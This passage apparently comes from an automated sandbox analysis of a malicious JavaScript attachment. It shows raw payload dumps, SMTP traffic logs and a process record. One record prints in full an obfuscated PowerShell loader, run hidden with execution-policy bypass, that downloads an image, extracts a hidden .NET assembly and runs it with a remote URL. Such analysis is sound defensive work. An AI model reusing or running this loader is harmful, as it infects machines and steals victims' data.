AEGZsBQYQZ3RmtEWAEWTrRTO4xGAhx0RBZzRpdzSCBQYGZXRHZEW3BQYBZFAhVDWaFEAhRzVAE2MYpFAf9VZ1xWY2BgWptGAadWd3cDa2BgWnlFbAo1YDt2SAoVY2wGd6tGeIBgWYlWUTN0ZxATevBgWTBVeAoFRXVEMRJ1b5UDAaNTa1BQW5VlSNhXTWBQW2F1TLhXUQdTUAkVa0JFAZRFUNV0XUZFAZB1cAkFSoZXepBQWGdmdAkFRhJWeLBQ
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 30 4b 67 4a 4f 31 51 41 38 75 41 64 52 5a 62 41 45 54 53 46 77 73 59 41 70 43 42 72 71 30 57 41 45 6a 78 77 4d 56 51 41 38 69 52 71 43 68 55 41 6b 75 41 64 4d 56 51 41 30 32 67 6d 67 77 66 41 73 43 67 45 43 78 57 41 73 4f 69 37 45 4a 6d 41 5a 52 51 74 4d 5a 6c 41 5a 42 67 45 43 78 57 41 6b 47 77 66 78 55 69 41 42 51 51 74 4d 78 55 41 63 47 68 50 31 6b 59 41 63 75 67 4a 59 30 56 41 63 43 67 45 43 78 57 41 63 4f 43 56 46 46 42 42 35 4e 69 54 58 67 48 41 70 50 79 52 68 41 4b 42 35 4e 43 51 69 4d 4d 42 35 4e 53 4f 44 38 4c 42 35 4e 69 4d 45 6f 50 42 35 74 67 4a 59 30 46 41 38 4f 69 49 46 70 4e 41 42 4e 79 47 4a 74 52 41 70 4b 77 6a 43 78 6d 42 42 57 67 59 52 70 46 41 42 52 51 74 4d 78 45 41 38 47 68 50 31 6b 49 41 38 43 67 45 43 78 47 41 38 4b 67 4e 6a 6f 6d Data Ascii: 0KgJO1QA8uAdRZbAETSFwsYApCBrq0WAEjxwMVQA8iRqChUAkuAdMVQA02gmgwfAsCgECxWAsOi7EJmAZRQtMZlAZBgECxWAkGwfxUiABQQtMxUAcGhP1kYAcugJY0VAcCgECxWAcOCVFFBB5NiTXgHApPyRhAKB5NCQiMMB5NSOD8LB5NiMEoPB5tgJY0FA8OiIFpNABNyGJtRApKwjCxmBBWgYRpFABRQtMxEA8GhP1kIA8CgECxGA8KgNjom
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 6d 4c 77 6a 33 59 4a 43 47 43 41 41 41 41 41 4b 45 41 67 35 43 59 7a 4e 47 6d 67 35 41 41 41 41 41 63 43 2f 41 59 4f 41 53 49 45 62 59 59 49 41 41 41 41 41 6e 6b 4f 41 6c 50 41 4d 4b 67 48 41 52 43 41 41 41 45 51 51 67 41 51 35 43 45 6f 46 6d 47 67 35 41 41 41 41 42 41 45 54 41 51 75 41 50 65 6a 6c 49 59 49 41 41 41 41 41 6e 41 4f 41 6b 4c 67 4e 33 59 59 43 6d 44 41 41 41 41 77 4a 59 44 41 35 41 49 68 51 73 68 68 68 41 41 41 41 41 63 53 78 41 4d 2b 41 70 34 6a 6d 41 45 4a 41 41 41 51 41 2f 41 43 41 68 4c 67 34 4b 38 4d 41 52 43 41 41 41 45 41 50 73 44 51 34 43 45 6f 46 6d 47 67 35 41 41 41 41 42 6b 44 37 41 41 75 41 50 65 6a 6c 49 59 49 41 41 41 41 41 6e 77 4c 41 67 4c 67 4e 33 59 59 43 6d 44 41 41 41 41 77 4a 30 43 41 34 41 49 68 51 73 68 68 68 41 41 41 Data Ascii: mLwj3YJCGCAAAAAKEAg5CYzNGmg5AAAAAcC/AYOASIEbYYIAAAAAnkOAlPAMKgHARCAAAEQQgAQ5CEoFmGg5AAAABAETAQuAPejlIYIAAAAAnAOAkLgN3YYCmDAAAAwJYDA5AIhQshhhAAAAAcSxAM+Ap4jmAEJAAAQA/ACAhLg4K8MARCAAAEAPsDQ4CEoFmGg5AAAABkD7AAuAPejlIYIAAAAAnwLAgLgN3YYCmDAAAAwJ0CA4AIhQshhhAAA
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 41 49 67 58 7a 6c 6d 6a 41 45 41 44 2b 44 41 41 41 67 52 4f 42 34 50 41 41 41 77 41 67 41 41 43 4d 34 50 41 41 67 67 44 2b 44 41 41 41 6f 41 49 41 55 67 44 2b 72 41 41 41 73 2f 62 41 41 41 41 43 41 43 41 41 41 41 41 67 41 41 42 4d 34 50 41 41 41 41 49 35 45 67 2f 41 41 41 41 4a 41 43 41 49 77 67 2f 41 41 41 43 4f 34 50 41 41 41 41 44 67 6f 41 41 42 67 39 62 41 55 41 44 2b 62 41 41 43 77 48 4b 4b 41 41 41 70 38 47 41 44 77 67 2f 41 49 41 44 2b 44 41 41 41 51 53 4f 42 34 50 41 41 41 77 43 67 41 41 43 4d 34 50 41 41 67 67 44 2b 44 41 41 41 38 41 49 4b 41 51 41 59 2f 47 63 41 38 67 31 79 70 41 41 41 73 2f 62 5a 42 41 41 41 45 41 49 4b 41 41 41 71 38 47 41 41 77 67 2f 41 41 41 41 41 41 43 41 41 77 67 2f 41 49 41 44 2b 44 41 41 41 51 54 4f 42 34 50 41 41 41 67 Data Ascii: AIgXzlmjAEAD+DAAAgROB4PAAAwAgAACM4PAAggD+DAAAoAIAUgD+rAAAs/bAAAACACAAAAAgAABM4PAAAAI5Eg/AAAAJACAIwg/AAACO4PAAAADgoAABg9bAUAD+bAACwHKKAAAp8GADwg/AIAD+DAAAQSOB4PAAAwCgAACM4PAAggD+DAAA8AIKAQAY/GcA8g1ypAAAs/bZBAAAEAIKAAAq8GAAwg/AAAAAACAAwg/AIAD+DAAAQTOB4PAAAg
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 35 45 67 2f 41 41 41 41 4f 41 43 41 4e 77 67 2f 41 41 51 44 4f 34 50 41 41 41 77 41 67 6f 43 41 41 41 67 43 35 45 67 2f 41 41 41 41 43 41 43 41 4e 77 67 2f 41 41 51 44 4f 34 50 41 41 41 77 45 67 6f 41 41 43 4d 79 62 77 42 67 41 70 4a 48 41 43 77 67 2f 41 41 41 41 58 6b 54 41 2b 44 41 41 41 49 42 49 41 30 41 44 2b 44 41 41 4e 34 67 2f 41 41 41 41 4b 41 69 43 41 49 41 4a 76 42 41 41 41 41 41 49 41 49 41 44 2b 44 41 41 41 63 52 4f 42 34 50 41 41 41 51 43 67 41 51 44 4d 34 50 41 41 30 67 44 2b 44 41 41 41 51 42 49 41 41 41 41 74 69 44 41 41 41 67 44 35 45 67 2f 41 41 41 41 54 41 43 41 4e 77 67 2f 41 41 51 44 4f 34 50 41 41 41 67 46 67 6f 41 41 43 4d 79 62 41 45 51 43 2b 44 67 41 4d 34 50 41 41 41 67 46 35 45 67 2f 41 41 41 41 56 41 43 41 4e 77 67 2f 41 41 51 Data Ascii: 5Eg/AAAAOACANwg/AAQDO4PAAAwAgoCAAAgC5Eg/AAAACACANwg/AAQDO4PAAAwEgoAACMybwBgApJHACwg/AAAAXkTA+DAAAIBIA0AD+DAAN4g/AAAAKAiCAIAJvBAAAAAIAIAD+DAAAcROB4PAAAQCgAQDM4PAA0gD+DAAAQBIAAAAtiDAAAgD5Eg/AAAATACANwg/AAQDO4PAAAgFgoAACMybAEQC+DgAM4PAAAgF5Eg/AAAAVACANwg/AAQ
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 43 34 67 2f 41 41 41 41 47 41 43 41 42 34 67 2f 59 42 41 41 41 49 41 49 41 45 41 44 2b 44 41 41 41 63 52 4f 42 34 50 41 41 41 51 42 67 41 67 41 4d 34 50 41 41 41 51 41 45 68 44 41 43 34 67 2f 41 41 41 41 41 41 53 45 41 41 51 4a 41 41 51 41 63 42 51 42 77 4d 52 41 41 41 51 41 47 49 41 48 75 45 67 37 41 41 41 41 41 41 52 41 41 41 41 41 71 41 67 42 4d 34 2f 2f 2f 33 76 6f 34 41 41 41 41 55 41 4f 41 41 41 41 46 6b 54 41 2b 44 41 41 41 73 41 49 41 63 41 44 2b 44 41 41 48 34 67 2f 41 41 41 41 42 41 43 41 41 41 41 41 4b 6b 54 41 2b 44 41 41 41 41 41 49 41 63 41 44 2b 44 41 41 48 34 67 2f 41 41 41 41 4a 41 69 4b 42 41 41 41 46 31 49 41 41 41 41 41 67 41 41 41 41 41 51 33 6d 41 41 41 41 41 56 33 41 59 67 44 2b 44 67 41 4d 34 50 41 43 34 67 2f 4b 41 41 41 6c 2f 57 Data Ascii: C4g/AAAAGACAB4g/YBAAAIAIAEAD+DAAAcROB4PAAAQBgAgAM4PAAAQAEhDAC4g/AAAAAASEAAQJAAQAcBQBwMRAAAQAGIAHuEg7AAAAAARAAAAAqAgBM4///3vo4AAAAUAOAAAAFkTA+DAAAsAIAcAD+DAAH4g/AAAABACAAAAAKkTA+DAAAAAIAcAD+DAAH4g/AAAAJAiKBAAAF1IAAAAAgAAAAAQ3mAAAAAV3AYgD+DgAM4PAC4g/KAAAl/W

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 30, 2024 10:39:02.930617094 CEST	587	49708	185.230.212.164	192.168.2.8	220 mx.zoho.eu SMTP Server ready August 30, 2024 10:39:02 AM CEST
Aug 30, 2024 10:39:02.931480885 CEST	49708	587	192.168.2.8	185.230.212.164	EHLO 114127
Aug 30, 2024 10:39:03.246649027 CEST	587	49708	185.230.212.164	192.168.2.8	250-mx.zoho.eu Hello 114127 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Aug 30, 2024 10:39:03.246896029 CEST	49708	587	192.168.2.8	185.230.212.164	STARTTLS
Aug 30, 2024 10:39:03.425973892 CEST	587	49708	185.230.212.164	192.168.2.8	220 Ready to start TLS.
Aug 30, 2024 10:39:06.299050093 CEST	587	49709	185.230.212.164	192.168.2.8	220 mx.zoho.eu SMTP Server ready August 30, 2024 10:39:06 AM CEST
Aug 30, 2024 10:39:06.299216032 CEST	49709	587	192.168.2.8	185.230.212.164	EHLO 114127
Aug 30, 2024 10:39:06.475491047 CEST	587	49709	185.230.212.164	192.168.2.8	250-mx.zoho.eu Hello 114127 (8.46.123.33 (8.46.123.33))
Aug 30, 2024 10:39:06.603351116 CEST	587	49709	185.230.212.164	192.168.2.8	250-STARTTLS 250 SIZE 53477376
Aug 30, 2024 10:39:06.603543997 CEST	49709	587	192.168.2.8	185.230.212.164	STARTTLS
Aug 30, 2024 10:39:06.779154062 CEST	587	49709	185.230.212.164	192.168.2.8	220 Ready to start TLS.

Target ID:	0
Start time:	04:38:50
Start date:	30/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js"
Imagebase:	0x7ff74cc70000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:38:51
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?RwBS? ? ? ? ?E8? ? ? ? ?LwBn? ? ? ? ?G8? ? ? ? ?b? ? ? ? ?? ? ? ? ?v? ? ? ? ?G0? ? ? ? ?bwBj? ? ? ? ?C4? ? ? ? ?bwBu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?HM? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?MQ? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Qw? ? ? ? ?6? ? ? ? ?Fw? ? ? ? ?U? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?ZwBy? ? ? ? ?GE? ? ? ? ?bQBE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Fw? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?c? ? ? ? ?Bo? ? ? ? ?Gk? ? ? ? ?YQBu? ? ? ? ?HQ? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
